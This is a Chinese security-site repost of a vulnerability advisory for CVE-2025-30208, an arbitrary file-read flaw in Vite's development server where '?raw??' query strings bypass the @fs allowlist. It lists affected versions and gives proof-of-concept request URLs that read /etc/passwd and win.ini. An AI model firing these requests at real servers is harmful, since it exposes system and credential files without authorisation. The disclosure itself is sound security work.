CVE-2025-30208|Vite任意文件读取漏洞(POC)

admin 2025年3月30日22:44:44评论3 views字数 703阅读2分20秒阅读模式

0x00 前言

Vite 是一个现代化的前端构建工具,旨在通过利用现代浏览器的原生 ES 模块支持,提供快速的开发体验。广泛应用于Vue.js等项目的开发中。在其开发服务器模式下,Vite提供了@fs机制,用于访问服务允许范围内的文件。

Vite 由两部分组成:

1、开发服务器:基于原生 ES 模块,提供超快的热更新。

2、构建命令:使用 Rollup 打包代码,生成适用于生产环境的优化静态资源。

0x01 漏洞描述

Vite 的@fs机制本用于限制对非白名单目录的访问,但其在 URL 解析时未正确处理?raw???import&raw??等查询参数,导致安全检查被绕过。

例如,攻击者可构造类似/@fs/etc/passwd?raw??的请求,导致攻击者可绕过 server.fs.allow 限制,直接读取任意文件内容。

0x02 CVE编号

CVE-2025-30208

0x03 影响版本

6.2.0 <= vite < 6.2.36.1.0 <= vite < 6.1.26.0.0 <= vite < 6.0.125.0.0 <= vite < 5.4.15vite < 4.5.10

0x04 漏洞详情

POC:

Linux:"http://x.x.x.x/@fs/etc/passwd?raw??"
Windows:"http://x.x.x.x/@fs/C:/Windows/win.ini?raw??"
CVE-2025-30208|Vite任意文件读取漏洞(POC)

0x05 参考链接

https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w

原文始发于微信公众号(信安百科):CVE-2025-30208|Vite任意文件读取漏洞(POC)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月30日22:44:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2025-30208|Vite任意文件读取漏洞(POC)https://cn-sec.com/archives/3897838.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息